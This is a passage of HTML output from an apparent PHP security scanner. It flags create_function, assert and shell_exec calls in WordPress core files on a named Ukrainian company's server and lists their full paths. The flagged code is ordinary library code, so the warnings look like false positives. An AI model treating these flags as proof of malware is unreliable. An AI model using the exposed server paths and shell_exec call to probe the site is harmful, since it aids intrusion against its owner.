1414e381)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">$mode&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">0</span><span style="color: #007700">;<br />&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">$attrname&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #DD0000">''</span><span style="color: #007700">;<br />&nbsp;&nbsp;&nbsp;&nbsp;</span><span style="color: #0000BB">$uris&nbsp;</span><span style="color: #007700">=&nbsp;array(</span><span style="color: #DD0000">'xmlns'</span><span style="color: #007700">,&nbsp;</span><span style="color: #DD0000">'profile'</span><span style="color: #007700">,&nbsp;</span><span style="color: #DD0000">'href'</span><span style="color: #007700">,&nbsp;</span><span style="color: #DD0000">'src'</span><span style="color: #007700">,&nbsp;</span><span style="color: #DD0000">'cite'</span><span style="color: #007700">,&nbsp;</span><span style="color: #DD0000">'classid'</span><span style="color: #007700">,&nbsp;</span><span style="color: #DD0000">'codebase'</span><span style="color: #007700">,&nbsp;</span><span style="color: #DD0000">'data'</span><span style="color: #007700">,&nbsp;</span><span style="color: #DD0000">'usemap'</span><span style="color: #007700">,&nbsp;</span><span style="color: #DD0000">'longdesc'</span><span style="color: #007700">,</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_125").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/Новый каталог/wp-includes/pomo/po.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 11.67 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:08</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:53</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 1</span><br><table id="file_126" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Function create_function <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `create_function`</p><p><i>[<a href="https://www.php.net/create_function" target="_blank" class="text-primary">https://www.php.net/create_function</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">create_function</span><span style="color: #007700">(</span><span style="color: #DD0000">'$x'</span><span style="color: #007700">,&nbsp;</span><span style="color: #DD0000">"return&nbsp;</span><span style="color: #0000BB">$php_with</span><span style="color: #DD0000">.\$x;"</span><span style="color: #007700">),&nbsp;</span><span style="color: #0000BB">$lines</span><span style="color: #007700">));&nbsp;if&nbsp;(</span><span style="color: #DD0000">"\n"&nbsp;</span><span style="color: #007700">==&nbsp;</span><span style="color: #0000BB">substr</span><span style="color: #007700">(</span><span style="color: #0000BB">$string</span><span style="color: #007700">,&nbsp;-</span><span style="color: #0000BB">1</span><span style="color: #007700">))&nbsp;</span><span style="color: #0000BB">$res&nbsp;</span><span style="color: #007700">.=&nbsp;</span><span style="color: #DD0000">"\n"</span><span style="color: #007700">;&nbsp;return&nbsp;</span><span style="color: #0000BB">$res</span><span style="color: #007700">;&nbsp;}&nbsp;function&nbsp;</span><span style="color: #0000BB">comment_block</span><span style="color: #007700">(</span><span style="color: #0000BB">$text</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$char</span><span style="color: #007700">=</span><span style="color: #DD0000">'&nbsp;'</span><span style="color: #007700">)&nbsp;{&nbsp;</span><span style="color: #0000BB">$text&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">wordwrap</span><span style="color: #007700">(</span><span style="color: #0000BB">$text</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">PO_MAX_LINE_LEN&nbsp;</span><span style="color: #007700">-&nbsp;</span><span style="color: #0000BB">3</span><span style="color: #007700">);&nbsp;return&nbsp;</span><span style="color: #0000BB">PO</span><span style="color: #007700">::</span><span style="color: #0000BB">prepend_each_line</span><span style="color: #007700">(</span><span style="color: #0000BB">$text</span><span style="color: #007700">,&nbsp;</span><span style="color: #DD0000">"#</span><span style="color: #0000BB">$char</span><span style="color: #DD0000">&nbsp;"</span><span style="color: #007700">);&nbsp;}&nbsp;function&nbsp;</span><span style="color: #0000BB">export_entry</span><span style="color: #007700">(&amp;</span><span style="color: #0000BB">$entry</span><span style="color: #007700">)&nbsp;{&nbsp;if&nbsp;(</span><span style="color: #0000BB">is_null</span><span style="color: #007700">(</span><span style="color: #0000BB">$entry</span><span style="color: #007700">-&gt;</span><span style="color: #0000BB">singular</span><span style="color: #007700">))&nbsp;return&nbsp;</span><span style="color: #0000BB">false</span><span style="color: #007700">;&nbsp;</span><span style="color: #0000BB">$po&nbsp;</span><span style="color: #007700">=&nbsp;array();&nbsp;if&nbsp;(!empty(</span><span style="color: #0000BB">$entry</span><span style="color: #007700">-&gt;</span><span style="color: #0000BB">translator_comments</span><span style="color: #007700">))&nbsp;</span><span style="color: #0000BB">$po</span><span style="color: #007700">[]&nbsp;=&nbsp;</span><span style="color: #0000BB">PO</span><span style="color: #007700">::</span><span style="color: #0000BB">comment_block</span><span style="color: #007700">(</span><span style="color: #0000BB">$entry</span><span style="color: #007700">-&gt;</span><span style="color: #0000BB">translator_comments</span><span style="color: #007700">);&nbsp;if&nbsp;(!empty(</span><span style="color: #0000BB">$entry</span><span style="color: #007700">-&gt;</span><span style="color: #0000BB">extracted_comments</span><span style="color: #007700">))&nbsp;</span><span style="color: #0000BB">$po</span><span style="color: #007700">[]&nbsp;=&nbsp;</span><span style="color: #0000BB">PO</span><span style="color: #007700">:...</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_126").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/Новый каталог/wp-includes/pomo/translations.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 8.17 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:08</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:53</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 1</span><br><table id="file_127" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Function create_function <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `create_function`</p><p><i>[<a href="https://www.php.net/create_function" target="_blank" class="text-primary">https://www.php.net/create_function</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">create_function</span><span style="color: #007700">(</span><span style="color: #DD0000">'$n'</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$func_body</span><span style="color: #007700">);&nbsp;}&nbsp;function&nbsp;</span><span style="color: #0000BB">parenthesize_plural_exression</span><span style="color: #007700">(</span><span style="color: #0000BB">$expression</span><span style="color: #007700">)&nbsp;{&nbsp;</span><span style="color: #0000BB">$expression&nbsp;</span><span style="color: #007700">.=&nbsp;</span><span style="color: #DD0000">';'</span><span style="color: #007700">;&nbsp;</span><span style="color: #0000BB">$res&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #DD0000">''</span><span style="color: #007700">;&nbsp;</span><span style="color: #0000BB">$depth&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">0</span><span style="color: #007700">;&nbsp;for&nbsp;(</span><span style="color: #0000BB">$i&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">0</span><span style="color: #007700">;&nbsp;</span><span style="color: #0000BB">$i&nbsp;</span><span style="color: #007700">&lt;&nbsp;</span><span style="color: #0000BB">strlen</span><span style="color: #007700">(</span><span style="color: #0000BB">$expression</span><span style="color: #007700">);&nbsp;++</span><span style="color: #0000BB">$i</span><span style="color: #007700">)&nbsp;{&nbsp;</span><span style="color: #0000BB">$char&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">$expression</span><span style="color: #007700">[</span><span style="color: #0000BB">$i</span><span style="color: #007700">];&nbsp;switch&nbsp;(</span><span style="color: #0000BB">$char</span><span style="color: #007700">)&nbsp;{&nbsp;case&nbsp;</span><span style="color: #DD0000">'?'</span><span style="color: #007700">:&nbsp;</span><span style="color: #0000BB">$res&nbsp;</span><span style="color: #007700">.=&nbsp;</span><span style="color: #DD0000">'&nbsp;?&nbsp;('</span><span style="color: #007700">;&nbsp;</span><span style="color: #0000BB">$depth</span><span style="color: #007700">++;&nbsp;break;&nbsp;case&nbsp;</span><span style="color: #DD0000">':'</span><span style="color: #007700">:&nbsp;</span><span style="color: #0000BB">$res&nbsp;</span><span style="color: #007700">.=&nbsp;</span><span style="color: #DD0000">')&nbsp;:&nbsp;('</span><span style="color: #007700">;&nbsp;break;&nbsp;case&nbsp;</span><span style="color: #DD0000">';'</span><span style="color: #007700">:&nbsp;</span><span style="color: #0000BB">$res&nbsp;</span><span style="color: #007700">.=&nbsp;</span><span style="color: #0000BB">str_repeat</span><span style="color: #007700">(</span><span style="color: #DD0000">')'</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$depth</span><span style="color: #007700">)&nbsp;.&nbsp;</span><span style="color: #DD0000">';'</span><span style="color: #007700">;&nbsp;</span><span style="color: #0000BB">$depth</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">0</span><span style="color: #007700">;&nbsp;break;&nbsp;default:&nbsp;</span><span style="color: #0000BB">$res&nbsp;</span><span style="color: #007700">.=&nbsp;</span><span style="color: #0000BB">$char</span><span style="color: #007700">;&nbsp;}&nbsp;}&nbsp;return&nbsp;</span><span style="color: #0000BB">rtrim</span><span style="color: #007700">(</span><span style="color: #0000BB">$res</span><span style="color: #007700">,&nbsp;</span><span style="color: #DD0000">';'</span><span style="color: #007700">);&nbsp;}&nbsp;function&nbsp;</span><span style="color: #0000BB">make_headers</span><span style="color: #007700">(</span><span style="color: #0000BB">$translation</span><span style="color: #007700">)&nbsp;{&nbsp;</span><span style="color: #0000BB">$headers&nbsp;</span><span style="color: #007700">=&nbsp;array();&nbsp;</span><span style="color: #0000BB">$translation&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">str_r</span><span style="color: #007700">...</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_127").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/Новый каталог/wp-includes/Text/Diff.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 11.67 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:08</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:53</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 1</span><br><table id="file_128" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Function assert <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `assert`</p><p><i>[<a href="https://www.php.net/assert" target="_blank" class="text-primary">https://www.php.net/assert</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">assert</span><span style="color: #007700">(</span><span style="color: #0000BB">count</span><span style="color: #007700">(</span><span style="color: #0000BB">$from_lines</span><span style="color: #007700">)&nbsp;==&nbsp;</span><span style="color: #0000BB">count</span><span style="color: #007700">(</span><span style="color: #0000BB">$mapped_from_lines</span><span style="color: #007700">));&nbsp;</span><span style="color: #0000BB">assert</span><span style="color: #007700">(</span><span style="color: #0000BB">count</span><span style="color: #007700">(</span><span style="color: #0000BB">$to_lines</span><span style="color: #007700">)&nbsp;==&nbsp;</span><span style="color: #0000BB">count</span><span style="color: #007700">(</span><span style="color: #0000BB">$mapped_to_lines</span><span style="color: #007700">));&nbsp;</span><span style="color: #0000BB">parent</span><span style="color: #007700">::</span><span style="color: #0000BB">Text_Diff</span><span style="color: #007700">(</span><span style="color: #0000BB">$mapped_from_lines</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$mapped_to_lines</span><span style="color: #007700">);&nbsp;</span><span style="color: #0000BB">$xi&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">$yi&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">0</span><span style="color: #007700">;&nbsp;for&nbsp;(</span><span style="color: #0000BB">$i&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">0</span><span style="color: #007700">;&nbsp;</span><span style="color: #0000BB">$i&nbsp;</span><span style="color: #007700">&lt;&nbsp;</span><span style="color: #0000BB">count</span><span style="color: #007700">(</span><span style="color: #0000BB">$this</span><span style="color: #007700">-&gt;</span><span style="color: #0000BB">_edits</span><span style="color: #007700">);&nbsp;</span><span style="color: #0000BB">$i</span><span style="color: #007700">++)&nbsp;{&nbsp;</span><span style="color: #0000BB">$orig&nbsp;</span><span style="color: #007700">=&nbsp;&amp;</span><span style="color: #0000BB">$this</span><span style="color: #007700">-&gt;</span><span style="color: #0000BB">_edits</span><span style="color: #007700">[</span><span style="color: #0000BB">$i</span><span style="color: #007700">]-&gt;</span><span style="color: #0000BB">orig</span><span style="color: #007700">;&nbsp;if&nbsp;(</span><span style="color: #0000BB">is_array</span><span style="color: #007700">(</span><span style="color: #0000BB">$orig</span><span style="color: #007700">))&nbsp;{&nbsp;</span><span style="color: #0000BB">$orig&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">array_slice</span><span style="color: #007700">(</span><span style="color: #0000BB">$from_lines</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$xi</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">count</span><span style="color: #007700">(</span><span style="color: #0000BB">$orig</span><span style="color: #007700">));&nbsp;</span><span style="color: #0000BB">$xi&nbsp;</span><span style="color: #007700">+=&nbsp;</span><span style="color: #0000BB">count</span><span style="color: #007700">(</span><span style="color: #0000BB">$orig</span><span style="color: #007700">);&nbsp;}&nbsp;</span><span style="color: #0000BB">$final&nbsp;</span><span style="color: #007700">=&nbsp;&amp;</span><span style="color: #0000BB">$this</span><span style="color: #007700">-&gt;</span><span style="color: #0000BB">_edits</span><span style="color: #007700">[</span><span style="color: #0000BB">$i</span><span style="color: #007700">]-&gt;</span><span style="color: #0000BB">final</span><span style="color: #007700">;&nbsp;if&nbsp;(</span><span style="color: #0000BB">is_array</span><span style="color: #007700">(</span><span style="color: #0000BB">$final</span><span style="color: #007700">))&nbsp;{&nbsp;</span><span style="color: #0000BB">$final&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">array_slice</span><span style="color: #007700">(</span><span style="color: #0000BB">$to_lines</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$yi</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">count</span><span style="color: #007700">(</span><span style="color: #0000BB">$final</span><span style="color: #007700">));&nbsp;</span><span style="color: #0000BB">$yi&nbsp;</span><span style="color: #007700">+=&nbsp;</span><span style="color: #0000BB">count</span><span style="color: #007700">(</span><span style="color: #0000BB">$final</span><span style="color: #007700">);&nbsp;}&nbsp;...</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_128").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/Новый каталог/wp-includes/Text/Diff/Engine/shell.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 5.05 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:08</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:53</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 2</span><br><table id="file_129" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Function assert <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `assert`</p><p><i>[<a href="https://www.php.net/assert" target="_blank" class="text-primary">https://www.php.net/assert</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">assert</span><span style="color: #007700">(</span><span style="color: #DD0000">'$match[1]&nbsp;-&nbsp;$from_line_no&nbsp;==&nbsp;$match[4]&nbsp;-&nbsp;$to_line_no'</span><span style="color: #007700">);&nbsp;</span><span style="color: #0000BB">array_push</span><span style="color: #007700">(</span><span style="color: #0000BB">$edits</span><span style="color: #007700">,&nbsp;new&nbsp;</span><span style="color: #0000BB">Text_Diff_Op_copy</span><span style="color: #007700">(&nbsp;</span><span style="color: #0000BB">$this</span><span style="color: #007700">-&gt;</span><span style="color: #0000BB">_getLines</span><span style="color: #007700">(</span><span style="color: #0000BB">$from_lines</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$from_line_no</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$match</span><span style="color: #007700">[</span><span style="color: #0000BB">1</span><span style="color: #007700">]&nbsp;-&nbsp;</span><span style="color: #0000BB">1</span><span style="color: #007700">),&nbsp;</span><span style="color: #0000BB">$this</span><span style="color: #007700">-&gt;</span><span style="color: #0000BB">_getLines</span><span style="color: #007700">(</span><span style="color: #0000BB">$to_lines</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$to_line_no</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$match</span><span style="color: #007700">[</span><span style="color: #0000BB">4</span><span style="color: #007700">]&nbsp;-&nbsp;</span><span style="color: #0000BB">1</span><span style="color: #007700">)));&nbsp;}&nbsp;switch&nbsp;(</span><span style="color: #0000BB">$match</span><span style="color: #007700">[</span><span style="color: #0000BB">3</span><span style="color: #007700">])&nbsp;{&nbsp;case&nbsp;</span><span style="color: #DD0000">'d'</span><span style="color: #007700">:&nbsp;</span><span style="color: #0000BB">array_push</span><span style="color: #007700">(</span><span style="color: #0000BB">$edits</span><span style="color: #007700">,&nbsp;new&nbsp;</span><span style="color: #0000BB">Text_Diff_Op_delete</span><span style="color: #007700">(&nbsp;</span><span style="color: #0000BB">$this</span><span style="color: #007700">-&gt;</span><span style="color: #0000BB">_getLines</span><span style="color: #007700">(</span><span style="color: #0000BB">$from_lines</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$from_line_no</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$match</span><span style="color: #007700">[</span><span style="color: #0000BB">2</span><span style="color: #007700">])));&nbsp;</span><span style="color: #0000BB">$to_line_no</span><span style="color: #007700">++;&nbsp;break;&nbsp;case&nbsp;</span><span style="color: #DD0000">'c'</span><span style="color: #007700">:&nbsp;</span><span style="color: #0000BB">array_push</span><span style="color: #007700">(</span><span style="color: #0000BB">$edits</span><span style="color: #007700">,&nbsp;new&nbsp;</span><span style="color: #0000BB">Text_Diff_Op_change</span><span style="color: #007700">(&nbsp;</span><span style="color: #0000BB">$this</span><span style="color: #007700">-&gt;</span><span style="color: #0000BB">_getLines</span><span style="color: #007700">(</span><span style="color: #0000BB">$from_lines</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$from_line_no</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$match</span><span style="color: #007700">[</span><span style="color: #0000BB">2</span><span style="color: #007700">]),&nbsp;</span><span style="color: #0000BB">$this</span><span style="color: #007700">...</span>
</span>
</code></code></td></tr><tr><td><p><b>Function shell_exec <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `shell_exec`</p><p><i>[<a href="https://www.php.net/shell_exec" target="_blank" class="text-primary">https://www.php.net/shell_exec</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">shell_exec</span><span style="color: #007700">(</span><span style="color: #0000BB">$this</span><span style="color: #007700">-&gt;</span><span style="color: #0000BB">_diffCommand&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #DD0000">'&nbsp;'&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #0000BB">$from_file&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #DD0000">'&nbsp;'&nbsp;</span><span style="color: #007700">.&nbsp;</span><span style="color: #0000BB">$to_file</span><span style="color: #007700">);&nbsp;</span><span style="color: #0000BB">unlink</span><span style="color: #007700">(</span><span style="color: #0000BB">$from_file</span><span style="color: #007700">);&nbsp;</span><span style="color: #0000BB">unlink</span><span style="color: #007700">(</span><span style="color: #0000BB">$to_file</span><span style="color: #007700">);&nbsp;if&nbsp;(</span><span style="color: #0000BB">is_null</span><span style="color: #007700">(</span><span style="color: #0000BB">$diff</span><span style="color: #007700">))&nbsp;{&nbsp;return&nbsp;array(new&nbsp;</span><span style="color: #0000BB">Text_Diff_Op_copy</span><span style="color: #007700">(</span><span style="color: #0000BB">$from_lines</span><span style="color: #007700">));&nbsp;}&nbsp;</span><span style="color: #0000BB">$from_line_no&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">1</span><span style="color: #007700">;&nbsp;</span><span style="color: #0000BB">$to_line_no&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">1</span><span style="color: #007700">;&nbsp;</span><span style="color: #0000BB">$edits&nbsp;</span><span style="color: #007700">=&nbsp;array();&nbsp;</span><span style="color: #0000BB">preg_match_all</span><span style="color: #007700">(</span><span style="color: #DD0000">'#^(\d+)(?:,(\d+))?([adc])(\d+)(?:,(\d+))?$#m'</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$diff</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$matches</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">PREG_SET_ORDER</span><span style="color: #007700">);&nbsp;foreach&nbsp;(</span><span style="color: #0000BB">$matches&nbsp;</span><span style="color: #007700">as&nbsp;</span><span style="color: #0000BB">$match</span><span style="color: #007700">)&nbsp;{&nbsp;if&nbsp;(!isset(</span><span style="color: #0000BB">$match</span><span style="color: #007700">[</span><span style="color: #0000BB">5</span><span style="color: #007700">]))&nbsp;{&nbsp;</span><span style="color: #0000BB">$match</span><span style="color: #007700">[</span><span style="color: #0000BB">5</span><span style="color: #007700">]&nbsp;=&nbsp;</span><span style="color: #0000BB">false</span><span style="color: #007700">;&nbsp;}&nbsp;if&nbsp;(</span><span style="color: #0000BB">$match</span><span style="color: #007700">[</span><span style="color: #0000BB">3</span><span style="color: #007700">]&nbsp;==&nbsp;</span><span style="color: #DD0000">'a'</span><span style="color: #007700">)&nbsp;{&nbsp;</span><span style="color: #0000BB">$from_line_no</span><span style="color: #007700">--;&nbsp;}&nbsp;if&nbsp;(</span><span style="color: #0000BB">$match</span><span style="color: #007700">[</span><span style="color: #0000BB">3</span><span style="color: #007700">]&nbsp;==&nbsp;</span><span style="color: #DD0000">'d'</span><span style="color: #007700">)&nbsp;{&nbsp;</span><span style="color: #0000BB">$to_line_no</span><span style="color: #007700">--;&nbsp;}&nbsp;if&nbsp;(</span><span style="color: #0000BB">$fr</span><span style="color: #007700">...</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_129").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/Новый каталог/wp-includes/Text/Diff/Engine/native.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 15.47 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:08</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:53</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 1</span><br><table id="file_130" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Function assert <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `assert`</p><p><i>[<a href="https://www.php.net/assert" target="_blank" class="text-primary">https://www.php.net/assert</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">assert</span><span style="color: #007700">(</span><span style="color: #0000BB">$yi&nbsp;</span><span style="color: #007700">&lt;&nbsp;</span><span style="color: #0000BB">$n_to&nbsp;</span><span style="color: #007700">||&nbsp;</span><span style="color: #0000BB">$this</span><span style="color: #007700">-&gt;</span><span style="color: #0000BB">xchanged</span><span style="color: #007700">[</span><span style="color: #0000BB">$xi</span><span style="color: #007700">]);&nbsp;</span><span style="color: #0000BB">assert</span><span style="color: #007700">(</span><span style="color: #0000BB">$xi&nbsp;</span><span style="color: #007700">&lt;&nbsp;</span><span style="color: #0000BB">$n_from&nbsp;</span><span style="color: #007700">||&nbsp;</span><span style="color: #0000BB">$this</span><span style="color: #007700">-&gt;</span><span style="color: #0000BB">ychanged</span><span style="color: #007700">[</span><span style="color: #0000BB">$yi</span><span style="color: #007700">]);&nbsp;</span><span style="color: #0000BB">$copy&nbsp;</span><span style="color: #007700">=&nbsp;array();&nbsp;while&nbsp;(</span><span style="color: #0000BB">$xi&nbsp;</span><span style="color: #007700">&lt;&nbsp;</span><span style="color: #0000BB">$n_from&nbsp;</span><span style="color: #007700">&amp;&amp;&nbsp;</span><span style="color: #0000BB">$yi&nbsp;</span><span style="color: #007700">&lt;&nbsp;</span><span style="color: #0000BB">$n_to&nbsp;</span><span style="color: #007700">&amp;&amp;&nbsp;!</span><span style="color: #0000BB">$this</span><span style="color: #007700">-&gt;</span><span style="color: #0000BB">xchanged</span><span style="color: #007700">[</span><span style="color: #0000BB">$xi</span><span style="color: #007700">]&nbsp;&amp;&amp;&nbsp;!</span><span style="color: #0000BB">$this</span><span style="color: #007700">-&gt;</span><span style="color: #0000BB">ychanged</span><span style="color: #007700">[</span><span style="color: #0000BB">$yi</span><span style="color: #007700">])&nbsp;{&nbsp;</span><span style="color: #0000BB">$copy</span><span style="color: #007700">[]&nbsp;=&nbsp;</span><span style="color: #0000BB">$from_lines</span><span style="color: #007700">[</span><span style="color: #0000BB">$xi</span><span style="color: #007700">++];&nbsp;++</span><span style="color: #0000BB">$yi</span><span style="color: #007700">;&nbsp;}&nbsp;if&nbsp;(</span><span style="color: #0000BB">$copy</span><span style="color: #007700">)&nbsp;{&nbsp;</span><span style="color: #0000BB">$edits</span><span style="color: #007700">[]&nbsp;=&nbsp;new&nbsp;</span><span style="color: #0000BB">Text_Diff_Op_copy</span><span style="color: #007700">(</span><span style="color: #0000BB">$copy</span><span style="color: #007700">);&nbsp;}&nbsp;</span><span style="color: #0000BB">$delete&nbsp;</span><span style="color: #007700">=&nbsp;array();&nbsp;while&nbsp;(</span><span style="color: #0000BB">$xi&nbsp;</span><span style="color: #007700">&lt;&nbsp;</span><span style="color: #0000BB">$n_from&nbsp;</span><span style="color: #007700">&amp;&amp;&nbsp;</span><span style="color: #0000BB">$this</span><span style="color: #007700">-&gt;</span><span style="color: #0000BB">xchanged</span><span style="color: #007700">[</span><span style="color: #0000BB">$xi</span><span style="color: #007700">])&nbsp;{&nbsp;</span><span style="color: #0000BB">$delete</span><span style="color: #007700">[]&nbsp;=&nbsp;</span><span style="color: #0000BB">$from_lines</span><span style="color: #007700">[</span><span style="color: #0000BB">$xi</span><span style="color: #007700">++];&nbsp;}&nbsp;</span><span style="color: #0000BB">$add&nbsp;</span><span style="color: #007700">=&nbsp;array();&nbsp;while&nbsp;(</span><span style="color: #0000BB">$yi&nbsp;</span><span style="color: #007700">&lt;&nbsp;</span><span style="color: #0000BB">$n_to&nbsp;</span><span style="color: #007700">&amp;&amp;&nbsp;</span><span style="color: #0000BB">$this</span><span style="color: #007700">-&gt;</span><span style="color: #0000BB">ychanged</span><span style="color: #007700">[</span><span style="color: #0000BB">$yi</span><span style="color: #007700">])&nbsp;{&nbsp;</span><span style="color: #0000BB">$add</span><span style="color: #007700">[]&nbsp;=&nbsp;</span><span style="color: #0000BB">$to_lines</span><span style="color: #007700">[</span><span style="color: #0000BB">$yi</span><span style="color: #007700">++];&nbsp;}&nbsp;if&nbsp;(</span><span style="color: #0000BB">$delete&nbsp;</span><span style="color: #007700">&amp;&amp;&nbsp;...</span>
</span>
